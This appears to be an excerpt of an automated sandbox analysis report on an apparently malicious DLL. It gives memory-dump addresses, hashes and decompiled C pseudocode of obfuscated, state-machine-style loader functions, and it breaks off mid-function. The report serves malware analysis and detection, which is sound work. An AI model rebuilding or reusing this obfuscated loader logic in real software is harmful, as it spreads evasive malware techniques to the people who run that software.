                                                                                                                                                                            0x02f72523
                                                                                                                                                                            0x02f72528
                                                                                                                                                                            0x02f7252b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7252b
                                                                                                                                                                            0x02f7248e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f72494
                                                                                                                                                                            0x02f72494
                                                                                                                                                                            0x02f72532
                                                                                                                                                                            0x02f7253b
                                                                                                                                                                            0x02f7253f
                                                                                                                                                                            0x02f72547
                                                                                                                                                                            0x02f7254c
                                                                                                                                                                            0x02f72571
                                                                                                                                                                            0x02f7257d
                                                                                                                                                                            0x02f72587
                                                                                                                                                                            0x02f725a7
                                                                                                                                                                            0x02f725ac
                                                                                                                                                                            0x02f725af
                                                                                                                                                                            0x02f725b1
                                                                                                                                                                            0x02f725b1
                                                                                                                                                                            0x02f725b1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: j8$qUO$-9$Hz$XGH
                                                                                                                                                                            • API String ID: 0-60989354
                                                                                                                                                                            • Opcode ID: ad17607f2c0a6add52d62497ce6338ec13012c70d3ac7b4470e8829d81ebc09b
                                                                                                                                                                            • Instruction ID: b788854dd3c5d4ffea3778bc83c32e53b72259728b8df46dac3328a981f53428
                                                                                                                                                                            • Opcode Fuzzy Hash: ad17607f2c0a6add52d62497ce6338ec13012c70d3ac7b4470e8829d81ebc09b
                                                                                                                                                                            • Instruction Fuzzy Hash: 52E121715097809FC3A8CF25C989A5BBBF1FBC4748F508A1DF6E986260D7B48948CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F73EE9() {
                                                                                                                                                                            				intOrPtr _t261;
                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                            				void* _t268;
                                                                                                                                                                            				signed char _t274;
                                                                                                                                                                            				intOrPtr _t277;
                                                                                                                                                                            				signed int _t288;
                                                                                                                                                                            				intOrPtr _t289;
                                                                                                                                                                            				signed char _t296;
                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                            				intOrPtr _t326;
                                                                                                                                                                            				intOrPtr _t330;
                                                                                                                                                                            				signed int _t333;
                                                                                                                                                                            				signed int _t334;
                                                                                                                                                                            				signed int _t335;
                                                                                                                                                                            				signed int _t336;
                                                                                                                                                                            				signed int _t337;
                                                                                                                                                                            				signed int _t338;
                                                                                                                                                                            				intOrPtr _t342;
                                                                                                                                                                            				void* _t344;
                                                                                                                                                                            
                                                                                                                                                                            				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
                                                                                                                                                                            				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
                                                                                                                                                                            				_t288 = 0x4bd14f4;
                                                                                                                                                                            				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
                                                                                                                                                                            				 *(_t344 + 0x4c) = 0x48601c;
                                                                                                                                                                            				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
                                                                                                                                                                            				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
                                                                                                                                                                            				 *(_t344 + 8) = 0xdbf1f3;
                                                                                                                                                                            				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
                                                                                                                                                                            				_t333 = 0x4c;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
                                                                                                                                                                            				 *(_t344 + 0x3c) = 0x6d1b19;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
                                                                                                                                                                            				 *(_t344 + 0x18) = 0x1a2d0d;
                                                                                                                                                                            				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
                                                                                                                                                                            				_t334 = 9;
                                                                                                                                                                            				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
                                                                                                                                                                            				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
                                                                                                                                                                            				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
                                                                                                                                                                            				 *(_t344 + 0x5c) = 0xa7cc6c;
                                                                                                                                                                            				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
                                                                                                                                                                            				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
                                                                                                                                                                            				 *(_t344 + 0x38) = 0x67bd1;
                                                                                                                                                                            				_t335 = 0x3d;
                                                                                                                                                                            				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
                                                                                                                                                                            				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
                                                                                                                                                                            				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
                                                                                                                                                                            				 *(_t344 + 0x28) = 0xde9e16;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
                                                                                                                                                                            				_t336 = 6;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
                                                                                                                                                                            				_t337 = 0x70;
                                                                                                                                                                            				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
                                                                                                                                                                            				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
                                                                                                                                                                            				 *(_t344 + 0x20) = 0xac092b;
                                                                                                                                                                            				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
                                                                                                                                                                            				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
                                                                                                                                                                            				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
                                                                                                                                                                            				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
                                                                                                                                                                            				 *(_t344 + 0x3c) = 0xd958f8;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
                                                                                                                                                                            				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
                                                                                                                                                                            				 *(_t344 + 0x1c) = 0x265505;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
                                                                                                                                                                            				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
                                                                                                                                                                            				 *(_t344 + 0x4c) = 0xea08b8;
                                                                                                                                                                            				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
                                                                                                                                                                            				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
                                                                                                                                                                            				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
                                                                                                                                                                            				 *(_t344 + 0x60) = 0x906ac9;
                                                                                                                                                                            				_t338 = 0x13;
                                                                                                                                                                            				_t330 =  *((intOrPtr*)(_t344 + 0x78));
                                                                                                                                                                            				_t342 =  *((intOrPtr*)(_t344 + 0x78));
                                                                                                                                                                            				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
                                                                                                                                                                            				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
                                                                                                                                                                            				 *(_t344 + 0x48) = 0xe018a0;
                                                                                                                                                                            				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
                                                                                                                                                                            				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
                                                                                                                                                                            				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
                                                                                                                                                                            				 *(_t344 + 0x44) = 0xcf92eb;
                                                                                                                                                                            				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
                                                                                                                                                                            				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
                                                                                                                                                                            				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
                                                                                                                                                                            				 *(_t344 + 0x40) = 0xa30b5e;
                                                                                                                                                                            				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
                                                                                                                                                                            				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
                                                                                                                                                                            				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
                                                                                                                                                                            				 *(_t344 + 0x50) = 0x1f98d4;
                                                                                                                                                                            				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
                                                                                                                                                                            				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
                                                                                                                                                                            				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
                                                                                                                                                                            				 *(_t344 + 0x64) = 0x5b61ba;
                                                                                                                                                                            				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
                                                                                                                                                                            				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
                                                                                                                                                                            				 *(_t344 + 0x2c) = 0xb4bbf5;
                                                                                                                                                                            				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
                                                                                                                                                                            				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
                                                                                                                                                                            				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
                                                                                                                                                                            				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
                                                                                                                                                                            				 *(_t344 + 0x28) = 0x1351a7;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
                                                                                                                                                                            				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
                                                                                                                                                                            				 *(_t344 + 0x70) = 0x74ba7c;
                                                                                                                                                                            				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
                                                                                                                                                                            				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
                                                                                                                                                                            				 *(_t344 + 0x30) = 0x6db52d;
                                                                                                                                                                            				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
                                                                                                                                                                            				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
                                                                                                                                                                            				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
                                                                                                                                                                            				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
                                                                                                                                                                            				 *(_t344 + 0x54) = 0x4f3eba;
                                                                                                                                                                            				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
                                                                                                                                                                            				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
                                                                                                                                                                            				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t316 =  *(_t344 + 0x68);
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                                                                                                                                                                            						L3:
                                                                                                                                                                            						while(_t288 != 0x42bf5b6) {
                                                                                                                                                                            							if(_t288 == 0x434f657) {
                                                                                                                                                                            								_push( *(_t344 + 0x1c));
                                                                                                                                                                            								_push( *(_t344 + 0x40));
                                                                                                                                                                            								_push( *(_t344 + 0x28));
                                                                                                                                                                            								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
                                                                                                                                                                            								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
                                                                                                                                                                            								_t268 = E02F6E1F8(0x2f51758,  *(_t344 + 0x30), __eflags);
                                                                                                                                                                            								_push( *(_t330 + 2) & 0x000000ff);
                                                                                                                                                                            								E02F5F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
                                                                                                                                                                            								_t223 = _t344 + 0x5c; // 0xa2772
                                                                                                                                                                            								E02F6FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
                                                                                                                                                                            								_t344 = _t344 + 0x40;
                                                                                                                                                                            								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
                                                                                                                                                                            								_t274 =  *((intOrPtr*)(_t330 + 6));
                                                                                                                                                                            								_t296 =  *((intOrPtr*)(_t330 + 7));
                                                                                                                                                                            								_t330 = _t330 + 8;
                                                                                                                                                                            								_t288 = 0x42bf5b6;
                                                                                                                                                                            								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t288 == 0x4bd14f4) {
                                                                                                                                                                            									_t326 =  *0x2f76228; // 0x0
                                                                                                                                                                            									_t288 = 0x70ba79f;
                                                                                                                                                                            									_t316 = _t326 + 0x14;
                                                                                                                                                                            									 *(_t344 + 0x68) = _t316;
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t288 == 0x70ba79f) {
                                                                                                                                                                            										_t277 = E02F63D85( *(_t344 + 0x60), 0x2f76000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
                                                                                                                                                                            										_t316 =  *(_t344 + 0x70);
                                                                                                                                                                            										_t330 = _t277;
                                                                                                                                                                            										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
                                                                                                                                                                            										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
                                                                                                                                                                            										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
                                                                                                                                                                            										_t288 = 0xc4a3c33;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t288 == 0x9fd5b32) {
                                                                                                                                                                            											__eflags = _t330 - _t261;
                                                                                                                                                                            											asm("sbb ecx, ecx");
                                                                                                                                                                            											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t288 == 0xae47d7a) {
                                                                                                                                                                            												E02F72B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
                                                                                                                                                                            											} else {
                                                                                                                                                                            												if(_t288 != 0xc4a3c33) {
                                                                                                                                                                            													L17:
                                                                                                                                                                            													__eflags = _t288 - 0xd28cf5a;
                                                                                                                                                                            													if(__eflags != 0) {
                                                                                                                                                                            														L2:
                                                                                                                                                                            														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                                                                                                                                                                            														continue;
                                                                                                                                                                            													}
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_push(_t288);
                                                                                                                                                                            													_push(_t288);
                                                                                                                                                                            													_t342 = E02F5C5D8(0x60);
                                                                                                                                                                            													_t344 = _t344 + 0xc;
                                                                                                                                                                            													if(_t342 != 0) {
                                                                                                                                                                            														_t288 = 0x434f657;
                                                                                                                                                                            														while(1) {
                                                                                                                                                                            															L1:
                                                                                                                                                                            															_t316 =  *(_t344 + 0x68);
                                                                                                                                                                            															while(1) {
                                                                                                                                                                            																L2:
                                                                                                                                                                            																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                                                                                                                                                                            																goto L3;
                                                                                                                                                                            															}
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t289 =  *0x2f76228; // 0x0
                                                                                                                                                                            							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
                                                                                                                                                                            							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
                                                                                                                                                                            							__eflags = 1;
                                                                                                                                                                            							return 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t262 =  *0x2f76228; // 0x0
                                                                                                                                                                            						_t288 = 0x9fd5b32;
                                                                                                                                                                            						 *_t316 = _t342;
                                                                                                                                                                            						_t316 = _t342 + 0x18;
                                                                                                                                                                            						 *(_t344 + 0x68) = _t316;
                                                                                                                                                                            						_t235 = _t262 + 0x18;
                                                                                                                                                                            						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
                                                                                                                                                                            						__eflags =  *_t235;
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}






















                                                                                                                                                                            0x02f73eec
                                                                                                                                                                            0x02f73ef3
                                                                                                                                                                            0x02f73ef8
                                                                                                                                                                            0x02f73efd
                                                                                                                                                                            0x02f73f05
                                                                                                                                                                            0x02f73f0d
                                                                                                                                                                            0x02f73f15
                                                                                                                                                                            0x02f73f1d
                                                                                                                                                                            0x02f73f2e
                                                                                                                                                                            0x02f73f38
                                                                                                                                                                            0x02f73f3d
                                                                                                                                                                            0x02f73f43
                                                                                                                                                                            0x02f73f48
                                                                                                                                                                            0x02f73f50
                                                                                                                                                                            0x02f73f58
                                                                                                                                                                            0x02f73f60
                                                                                                                                                                            0x02f73f65
                                                                                                                                                                            0x02f73f6d
                                                                                                                                                                            0x02f73f75
                                                                                                                                                                            0x02f73f7e
                                                                                                                                                                            0x02f73f83
                                                                                                                                                                            0x02f73f89
                                                                                                                                                                            0x02f73f91
                                                                                                                                                                            0x02f73f99
                                                                                                                                                                            0x02f73fa1
                                                                                                                                                                            0x02f73fa6
                                                                                                                                                                            0x02f73fae
                                                                                                                                                                            0x02f73fba
                                                                                                                                                                            0x02f73fbf
                                                                                                                                                                            0x02f73fc5
                                                                                                                                                                            0x02f73fca
                                                                                                                                                                            0x02f73fd2
                                                                                                                                                                            0x02f73fda
                                                                                                                                                                            0x02f73fe6
                                                                                                                                                                            0x02f73feb
                                                                                                                                                                            0x02f73ff5
                                                                                                                                                                            0x02f73ff8
                                                                                                                                                                            0x02f73ffc
                                                                                                                                                                            0x02f74004
                                                                                                                                                                            0x02f7400c
                                                                                                                                                                            0x02f74014
                                                                                                                                                                            0x02f7401c
                                                                                                                                                                            0x02f74024
                                                                                                                                                                            0x02f7402c
                                                                                                                                                                            0x02f74034
                                                                                                                                                                            0x02f7403c
                                                                                                                                                                            0x02f74041
                                                                                                                                                                            0x02f74049
                                                                                                                                                                            0x02f74051
                                                                                                                                                                            0x02f74059
                                                                                                                                                                            0x02f74061
                                                                                                                                                                            0x02f74069
                                                                                                                                                                            0x02f74071
                                                                                                                                                                            0x02f74079
                                                                                                                                                                            0x02f74086
                                                                                                                                                                            0x02f7408a
                                                                                                                                                                            0x02f74094
                                                                                                                                                                            0x02f740a3
                                                                                                                                                                            0x02f740a4
                                                                                                                                                                            0x02f740a8
                                                                                                                                                                            0x02f740ac
                                                                                                                                                                            0x02f740b0
                                                                                                                                                                            0x02f740b8
                                                                                                                                                                            0x02f740c0
                                                                                                                                                                            0x02f740c5
                                                                                                                                                                            0x02f740ca
                                                                                                                                                                            0x02f740d2
                                                                                                                                                                            0x02f740da
                                                                                                                                                                            0x02f740e2
                                                                                                                                                                            0x02f740ea
                                                                                                                                                                            0x02f740f2
                                                                                                                                                                            0x02f74100
                                                                                                                                                                            0x02f74104
                                                                                                                                                                            0x02f7410c
                                                                                                                                                                            0x02f74114
                                                                                                                                                                            0x02f7411c
                                                                                                                                                                            0x02f74124
                                                                                                                                                                            0x02f74129
                                                                                                                                                                            0x02f74131
                                                                                                                                                                            0x02f74139
                                                                                                                                                                            0x02f74141
                                                                                                                                                                            0x02f74149
                                                                                                                                                                            0x02f74151
                                                                                                                                                                            0x02f74159
                                                                                                                                                                            0x02f7415e
                                                                                                                                                                            0x02f74166
                                                                                                                                                                            0x02f7416e
                                                                                                                                                                            0x02f74176
                                                                                                                                                                            0x02f7417b
                                                                                                                                                                            0x02f74188
                                                                                                                                                                            0x02f7418c
                                                                                                                                                                            0x02f74194
                                                                                                                                                                            0x02f7419c
                                                                                                                                                                            0x02f741a4
                                                                                                                                                                            0x02f741ac
                                                                                                                                                                            0x02f741b4
                                                                                                                                                                            0x02f741b9
                                                                                                                                                                            0x02f741c1
                                                                                                                                                                            0x02f741c9
                                                                                                                                                                            0x02f741d1
                                                                                                                                                                            0x02f741d9
                                                                                                                                                                            0x02f741e1
                                                                                                                                                                            0x02f741e6
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f741f6
                                                                                                                                                                            0x02f74208
                                                                                                                                                                            0x02f742d3
                                                                                                                                                                            0x02f742df
                                                                                                                                                                            0x02f742e5
                                                                                                                                                                            0x02f742f0
                                                                                                                                                                            0x02f742f7
                                                                                                                                                                            0x02f742fb
                                                                                                                                                                            0x02f7430a
                                                                                                                                                                            0x02f74335
                                                                                                                                                                            0x02f7433a
                                                                                                                                                                            0x02f74352
                                                                                                                                                                            0x02f7435b
                                                                                                                                                                            0x02f74369
                                                                                                                                                                            0x02f7436d
                                                                                                                                                                            0x02f74370
                                                                                                                                                                            0x02f74373
                                                                                                                                                                            0x02f7437c
                                                                                                                                                                            0x02f74388
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7420e
                                                                                                                                                                            0x02f74214
                                                                                                                                                                            0x02f742bc
                                                                                                                                                                            0x02f742c2
                                                                                                                                                                            0x02f742c7
                                                                                                                                                                            0x02f742ca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7421a
                                                                                                                                                                            0x02f74220
                                                                                                                                                                            0x02f74299
                                                                                                                                                                            0x02f7429e
                                                                                                                                                                            0x02f742a2
                                                                                                                                                                            0x02f742a5
                                                                                                                                                                            0x02f742a9
                                                                                                                                                                            0x02f742ae
                                                                                                                                                                            0x02f742b2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f74222
                                                                                                                                                                            0x02f74228
                                                                                                                                                                            0x02f74272
                                                                                                                                                                            0x02f74274
                                                                                                                                                                            0x02f7427c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7422a
                                                                                                                                                                            0x02f74230
                                                                                                                                                                            0x02f743c4
                                                                                                                                                                            0x02f74236
                                                                                                                                                                            0x02f7423c
                                                                                                                                                                            0x02f743a7
                                                                                                                                                                            0x02f743a7
                                                                                                                                                                            0x02f743ad
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f74242
                                                                                                                                                                            0x02f74252
                                                                                                                                                                            0x02f74253
                                                                                                                                                                            0x02f7425b
                                                                                                                                                                            0x02f7425d
                                                                                                                                                                            0x02f74262
                                                                                                                                                                            0x02f74268
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741f2
                                                                                                                                                                            0x02f741ee
                                                                                                                                                                            0x02f74262
                                                                                                                                                                            0x02f7423c
                                                                                                                                                                            0x02f74230
                                                                                                                                                                            0x02f74228
                                                                                                                                                                            0x02f74220
                                                                                                                                                                            0x02f74214
                                                                                                                                                                            0x02f743cb
                                                                                                                                                                            0x02f743d7
                                                                                                                                                                            0x02f743db
                                                                                                                                                                            0x02f743e0
                                                                                                                                                                            0x02f743e5
                                                                                                                                                                            0x02f743e5
                                                                                                                                                                            0x02f74391
                                                                                                                                                                            0x02f74396
                                                                                                                                                                            0x02f7439b
                                                                                                                                                                            0x02f7439d
                                                                                                                                                                            0x02f743a0
                                                                                                                                                                            0x02f743a4
                                                                                                                                                                            0x02f743a4
                                                                                                                                                                            0x02f743a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f743a4
                                                                                                                                                                            0x02f741f2

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ldM'$q($r'$y%$z}
                                                                                                                                                                            • API String ID: 0-1771948706
                                                                                                                                                                            • Opcode ID: e708346922c485916b128f0bb6203950cb4c8fead6b1dab9a3724fdcfa34efcd
                                                                                                                                                                            • Instruction ID: 4b2634a8e128c2833d41b97293ba33a3079161b7421dd0fe5a2e6406ec2e1404
                                                                                                                                                                            • Opcode Fuzzy Hash: e708346922c485916b128f0bb6203950cb4c8fead6b1dab9a3724fdcfa34efcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 33D141725083809FD368CF25C48955BBBF2FBD5398F148A0EF2A696260D3B5C559CF82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F5FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				void* _t261;
                                                                                                                                                                            				intOrPtr* _t284;
                                                                                                                                                                            				void* _t286;
                                                                                                                                                                            				intOrPtr _t294;
                                                                                                                                                                            				intOrPtr* _t295;
                                                                                                                                                                            				void* _t297;
                                                                                                                                                                            				intOrPtr* _t299;
                                                                                                                                                                            				void* _t301;
                                                                                                                                                                            				void* _t325;
                                                                                                                                                                            				intOrPtr* _t327;
                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                            				signed int _t329;
                                                                                                                                                                            				signed int _t330;
                                                                                                                                                                            				signed int _t331;
                                                                                                                                                                            				signed int _t332;
                                                                                                                                                                            				signed int _t333;
                                                                                                                                                                            				signed int _t334;
                                                                                                                                                                            				signed int* _t337;
                                                                                                                                                                            
                                                                                                                                                                            				_t299 = _a4;
                                                                                                                                                                            				_push(_a8);
